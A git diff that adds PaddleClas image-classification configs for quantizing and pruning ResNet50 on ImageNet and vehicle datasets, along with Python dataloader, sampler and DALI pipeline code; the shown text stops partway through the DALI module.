size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_quantization.yaml new file mode 100644 index 0000000..aeccaea --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_quantization.yaml @@ -0,0 +1,137 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 30 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantalization or prune model +Slim: + ## for quantization + quant: + name: pact + +# model architecture +Arch: + name: ResNet50_vd + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ 
+ cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_prune.yaml new file mode 100644 index 0000000..5e59e1b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_prune.yaml @@ -0,0 +1,135 @@ +# global configs +Global: + checkpoints: null + pretrained_model: 
"https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_cls_ResNet50_CompCars_v1.2_pretrained.pdparams" + output_dir: "./output_vehicle_cls_prune/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +Slim: + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 431 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0005 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + bbox_crop: True + cls_label_path: "./dataset/CompCars/train_test_split/classification/train_label.txt" + transform_ops: + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] 
+ + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 8 + use_shared_memory: True + + Eval: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + cls_label_path: "./dataset/CompCars/train_test_split/classification/test_label.txt" + bbox_crop: True + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_quantization.yaml new file mode 100644 index 0000000..1ec73b0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_quantization.yaml @@ -0,0 +1,134 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_cls_ResNet50_CompCars_v1.2_pretrained.pdparams" + output_dir: "./output_vehicle_cls_pact/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 80 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +Slim: + quant: + name: pact + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: 
"ArcMargin" + embedding_size: 512 + class_num: 431 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.001 + regularizer: + name: 'L2' + coeff: 0.0005 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + bbox_crop: True + cls_label_path: "./dataset/CompCars/train_test_split/classification/train_label.txt" + transform_ops: + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 8 + use_shared_memory: True + + Eval: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + cls_label_path: "./dataset/CompCars/train_test_split/classification/test_label.txt" + bbox_crop: True + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_prune.yaml new file mode 100644 index 0000000..f9c86e2 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_prune.yaml @@ -0,0 +1,162 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_reid_ResNet50_VERIWild_v1.1_pretrained.pdparams" + output_dir: "./output_vehicle_reid_prune/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# for quantizaiton or prune model +Slim: + ## for prune + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 30671 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images/" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/train_list_start0.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] 
+ + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id_query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + + Gallery: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_quantization.yaml new file mode 100644 index 0000000..aff5228 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_quantization.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_reid_ResNet50_VERIWild_v1.1_pretrained.pdparams" + output_dir: "./output_vehicle_reid_pact/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 40 + 
print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# for quantizaiton or prune model +Slim: + ## for prune + quant: + name: pact + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 30671 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.001 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images/" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/train_list_start0.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] 
+ + sampler: + name: DistributedRandomIdentitySampler + batch_size: 64 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id_query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + + Gallery: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/data/__init__.py b/Smart_container/PaddleClas/ppcls/data/__init__.py new file mode 100644 index 0000000..fd41ea3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/__init__.py @@ -0,0 +1,139 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import copy
import paddle
import numpy as np
from paddle.io import DistributedBatchSampler, BatchSampler, DataLoader
from ppcls.utils import logger

from ppcls.data import dataloader
# dataset
from ppcls.data.dataloader.imagenet_dataset import ImageNetDataset
from ppcls.data.dataloader.multilabel_dataset import MultiLabelDataset
from ppcls.data.dataloader.common_dataset import create_operators
from ppcls.data.dataloader.vehicle_dataset import CompCars, VeriWild
from ppcls.data.dataloader.logo_dataset import LogoDataset
from ppcls.data.dataloader.icartoon_dataset import ICartoonDataset
from ppcls.data.dataloader.mix_dataset import MixDataset

# sampler
from ppcls.data.dataloader.DistributedRandomIdentitySampler import DistributedRandomIdentitySampler
from ppcls.data.dataloader.pk_sampler import PKSampler
from ppcls.data.dataloader.mix_sampler import MixSampler
from ppcls.data import preprocess
from ppcls.data.preprocess import transform


def create_operators(params):
    """Instantiate preprocess operators from a config list.

    NOTE: this definition shadows the ``create_operators`` imported from
    ``common_dataset`` above; the two implementations are identical.

    Args:
        params (list): list of single-key dicts, ``{op_name: op_kwargs}``.

    Returns:
        list: operator instances resolved from ``ppcls.data.preprocess``.
    """
    assert isinstance(params, list), ('operator config should be a list')
    ops = []
    for operator in params:
        assert isinstance(operator,
                          dict) and len(operator) == 1, "yaml format error"
        op_name = list(operator)[0]
        param = {} if operator[op_name] is None else operator[op_name]
        op = getattr(preprocess, op_name)(**param)
        ops.append(op)

    return ops


def build_dataloader(config, mode, device, use_dali=False, seed=None):
    """Build a ``paddle.io.DataLoader`` (or DALI iterator) for one mode.

    Args:
        config (dict): the ``DataLoader`` section of the global config,
            keyed by mode.
        mode (str): one of 'Train', 'Eval', 'Test', 'Gallery', 'Query'.
        device: paddle place(s) the loader feeds.
        use_dali (bool): when True, delegate to the NVIDIA DALI pipeline.
        seed (int|None): optional seed forwarded to DALI.

    Returns:
        paddle.io.DataLoader, or a DALI iterator when ``use_dali`` is True.
    """
    assert mode in [
        'Train', 'Eval', 'Test', 'Gallery', 'Query'
    ], "Dataset mode should be Train, Eval, Test, Gallery, Query"
    # build dataset
    if use_dali:
        from ppcls.data.dataloader.dali import dali_dataloader
        return dali_dataloader(config, mode, paddle.device.get_device(), seed)

    config_dataset = copy.deepcopy(config[mode]['dataset'])
    dataset_name = config_dataset.pop('name')
    if 'batch_transform_ops' in config_dataset:
        batch_transform = config_dataset.pop('batch_transform_ops')
    else:
        batch_transform = None

    dataset = eval(dataset_name)(**config_dataset)

    logger.debug("build dataset({}) success...".format(dataset))

    # build sampler
    # BUGFIX: deep-copy before popping "name" -- the original popped keys
    # out of the caller's config dict, so building the same loader twice
    # from one config raised KeyError (the dataset config above was already
    # deep-copied; the sampler config was not).
    config_sampler = copy.deepcopy(config[mode]['sampler'])
    if "name" not in config_sampler:
        batch_sampler = None
        batch_size = config_sampler["batch_size"]
        drop_last = config_sampler["drop_last"]
        shuffle = config_sampler["shuffle"]
    else:
        sampler_name = config_sampler.pop("name")
        batch_sampler = eval(sampler_name)(dataset, **config_sampler)

    logger.debug("build batch_sampler({}) success...".format(batch_sampler))

    # build batch operator
    def mix_collate_fn(batch):
        # apply batch-level transforms (e.g. mixup-style ops), then re-batch
        # the per-sample tuples field by field into stacked numpy arrays
        batch = transform(batch, batch_ops)
        slots = []
        for items in batch:
            for i, item in enumerate(items):
                if len(slots) < len(items):
                    slots.append([item])
                else:
                    slots[i].append(item)
        return [np.stack(slot, axis=0) for slot in slots]

    if isinstance(batch_transform, list):
        batch_ops = create_operators(batch_transform)
        batch_collate_fn = mix_collate_fn
    else:
        batch_collate_fn = None

    # build dataloader
    config_loader = config[mode]['loader']
    num_workers = config_loader["num_workers"]
    use_shared_memory = config_loader["use_shared_memory"]

    if batch_sampler is None:
        data_loader = DataLoader(
            dataset=dataset,
            places=device,
            num_workers=num_workers,
            return_list=True,
            use_shared_memory=use_shared_memory,
            batch_size=batch_size,
            shuffle=shuffle,
            drop_last=drop_last,
            collate_fn=batch_collate_fn)
    else:
        data_loader = DataLoader(
            dataset=dataset,
            places=device,
            num_workers=num_workers,
            return_list=True,
            use_shared_memory=use_shared_memory,
            batch_sampler=batch_sampler,
            collate_fn=batch_collate_fn)

    logger.debug("build data_loader({}) success...".format(data_loader))
    return data_loader
+ """ + + def __init__(self, dataset, batch_size, num_instances, drop_last, **args): + self.dataset = dataset + self.batch_size = batch_size + self.num_instances = num_instances + self.drop_last = drop_last + self.num_pids_per_batch = self.batch_size // self.num_instances + self.index_dic = defaultdict(list) + for index, pid in enumerate(self.dataset.labels): + self.index_dic[pid].append(index) + self.pids = list(self.index_dic.keys()) + # estimate number of examples in an epoch + self.length = 0 + for pid in self.pids: + idxs = self.index_dic[pid] + num = len(idxs) + if num < self.num_instances: + num = self.num_instances + self.length += num - num % self.num_instances + + def __iter__(self): + batch_idxs_dict = defaultdict(list) + for pid in self.pids: + idxs = copy.deepcopy(self.index_dic[pid]) + if len(idxs) < self.num_instances: + idxs = np.random.choice( + idxs, size=self.num_instances, replace=True) + random.shuffle(idxs) + batch_idxs = [] + for idx in idxs: + batch_idxs.append(idx) + if len(batch_idxs) == self.num_instances: + batch_idxs_dict[pid].append(batch_idxs) + batch_idxs = [] + avai_pids = copy.deepcopy(self.pids) + final_idxs = [] + while len(avai_pids) >= self.num_pids_per_batch: + selected_pids = random.sample(avai_pids, self.num_pids_per_batch) + for pid in selected_pids: + batch_idxs = batch_idxs_dict[pid].pop(0) + final_idxs.extend(batch_idxs) + if len(batch_idxs_dict[pid]) == 0: + avai_pids.remove(pid) + _sample_iter = iter(final_idxs) + batch_indices = [] + for idx in _sample_iter: + batch_indices.append(idx) + if len(batch_indices) == self.batch_size: + yield batch_indices + batch_indices = [] + if not self.drop_last and len(batch_indices) > 0: + yield batch_indices + + def __len__(self): + if self.drop_last: + return self.length // self.batch_size + else: + return (self.length + self.batch_size - 1) // self.batch_size diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/__init__.py 
b/Smart_container/PaddleClas/ppcls/data/dataloader/__init__.py new file mode 100644 index 0000000..8f81921 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/__init__.py @@ -0,0 +1,9 @@ +from ppcls.data.dataloader.imagenet_dataset import ImageNetDataset +from ppcls.data.dataloader.multilabel_dataset import MultiLabelDataset +from ppcls.data.dataloader.common_dataset import create_operators +from ppcls.data.dataloader.vehicle_dataset import CompCars, VeriWild +from ppcls.data.dataloader.logo_dataset import LogoDataset +from ppcls.data.dataloader.icartoon_dataset import ICartoonDataset +from ppcls.data.dataloader.mix_dataset import MixDataset +from ppcls.data.dataloader.mix_sampler import MixSampler +from ppcls.data.dataloader.pk_sampler import PKSampler diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/common_dataset.py b/Smart_container/PaddleClas/ppcls/data/dataloader/common_dataset.py new file mode 100644 index 0000000..b7b03d8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/common_dataset.py @@ -0,0 +1,84 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import print_function + +import numpy as np + +from paddle.io import Dataset +import cv2 + +from ppcls.data import preprocess +from ppcls.data.preprocess import transform +from ppcls.utils import logger + + +def create_operators(params): + """ + create operators based on the config + Args: + params(list): a dict list, used to create some operators + """ + assert isinstance(params, list), ('operator config should be a list') + ops = [] + for operator in params: + assert isinstance(operator, + dict) and len(operator) == 1, "yaml format error" + op_name = list(operator)[0] + param = {} if operator[op_name] is None else operator[op_name] + op = getattr(preprocess, op_name)(**param) + ops.append(op) + + return ops + + +class CommonDataset(Dataset): + def __init__( + self, + image_root, + cls_label_path, + transform_ops=None, ): + self._img_root = image_root + self._cls_path = cls_label_path + if transform_ops: + self._transform_ops = create_operators(transform_ops) + + self.images = [] + self.labels = [] + self._load_anno() + + def _load_anno(self): + pass + + def __getitem__(self, idx): + try: + with open(self.images[idx], 'rb') as f: + img = f.read() + if self._transform_ops: + img = transform(img, self._transform_ops) + img = img.transpose((2, 0, 1)) + return (img, self.labels[idx]) + + except Exception as ex: + logger.error("Exception occured when parse line: {} with msg: {}". + format(self.images[idx], ex)) + rnd_idx = np.random.randint(self.__len__()) + return self.__getitem__(rnd_idx) + + def __len__(self): + return len(self.images) + + @property + def class_num(self): + return len(set(self.labels)) diff --git a/Smart_container/PaddleClas/ppcls/data/dataloader/dali.py b/Smart_container/PaddleClas/ppcls/data/dataloader/dali.py new file mode 100644 index 0000000..a15c231 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/data/dataloader/dali.py @@ -0,0 +1,319 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. 
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import division

import copy
import os

import numpy as np
import nvidia.dali.ops as ops
import nvidia.dali.types as types
import paddle
from nvidia.dali import fn
from nvidia.dali.pipeline import Pipeline
from nvidia.dali.plugin.base_iterator import LastBatchPolicy
from nvidia.dali.plugin.paddle import DALIGenericIterator


class HybridTrainPipe(Pipeline):
    """DALI training pipeline: file reading, random-crop JPEG decode on
    'mixed' (CPU+GPU), then GPU resize and crop/mirror/normalize.
    """

    def __init__(self,
                 file_root,
                 file_list,
                 batch_size,
                 resize_shorter,
                 crop,
                 min_area,
                 lower,
                 upper,
                 interp,
                 mean,
                 std,
                 device_id,
                 shard_id=0,
                 num_shards=1,
                 random_shuffle=True,
                 num_threads=4,
                 seed=42,
                 pad_output=False,
                 output_dtype=types.FLOAT,
                 dataset='Train'):
        super(HybridTrainPipe, self).__init__(
            batch_size, num_threads, device_id, seed=seed)
        self.input = ops.readers.File(
            file_root=file_root,
            file_list=file_list,
            shard_id=shard_id,
            num_shards=num_shards,
            random_shuffle=random_shuffle)
        # set internal nvJPEG buffers size to handle full-sized ImageNet images
        # without additional reallocations
        device_memory_padding = 211025920
        host_memory_padding = 140544512
        # decode + random crop fused: random area/aspect-ratio crop of the
        # JPEG before full decode
        self.decode = ops.decoders.ImageRandomCrop(
            device='mixed',
            output_type=types.DALIImageType.RGB,
            device_memory_padding=device_memory_padding,
            host_memory_padding=host_memory_padding,
            random_aspect_ratio=[lower, upper],
            random_area=[min_area, 1.0],
            num_attempts=100)
        self.res = ops.Resize(
            device='gpu', resize_x=crop, resize_y=crop, interp_type=interp)
        self.cmnp = ops.CropMirrorNormalize(
            device="gpu",
            dtype=output_dtype,
            output_layout='CHW',
            crop=(crop, crop),
            mean=mean,
            std=std,
            pad_output=pad_output)
        # coin flip drives random horizontal mirroring in CropMirrorNormalize
        self.coin = ops.random.CoinFlip(probability=0.5)
        self.to_int64 = ops.Cast(dtype=types.DALIDataType.INT64, device="gpu")

    def define_graph(self):
        # graph: reader -> decode -> resize -> crop/mirror/normalize
        rng = self.coin()
        jpegs, labels = self.input(name="Reader")
        images = self.decode(jpegs)
        images = self.res(images)
        output = self.cmnp(images.gpu(), mirror=rng)
        return [output, self.to_int64(labels.gpu())]

    def __len__(self):
        # number of samples per epoch as reported by the reader
        return self.epoch_size("Reader")


class HybridValPipe(Pipeline):
    """DALI validation pipeline: plain decode, shorter-side resize, then
    center crop + normalize on GPU (no random augmentation).
    """

    def __init__(self,
                 file_root,
                 file_list,
                 batch_size,
                 resize_shorter,
                 crop,
                 interp,
                 mean,
                 std,
                 device_id,
                 shard_id=0,
                 num_shards=1,
                 random_shuffle=False,
                 num_threads=4,
                 seed=42,
                 pad_output=False,
                 output_dtype=types.FLOAT):
        super(HybridValPipe, self).__init__(
            batch_size, num_threads, device_id, seed=seed)
        self.input = ops.readers.File(
            file_root=file_root,
            file_list=file_list,
            shard_id=shard_id,
            num_shards=num_shards,
            random_shuffle=random_shuffle)
        self.decode = ops.decoders.Image(device="mixed")
        self.res = ops.Resize(
            device="gpu", resize_shorter=resize_shorter, interp_type=interp)
        self.cmnp = ops.CropMirrorNormalize(
            device="gpu",
            dtype=output_dtype,
            output_layout='CHW',
            crop=(crop, crop),
            mean=mean,
            std=std,
            pad_output=pad_output)
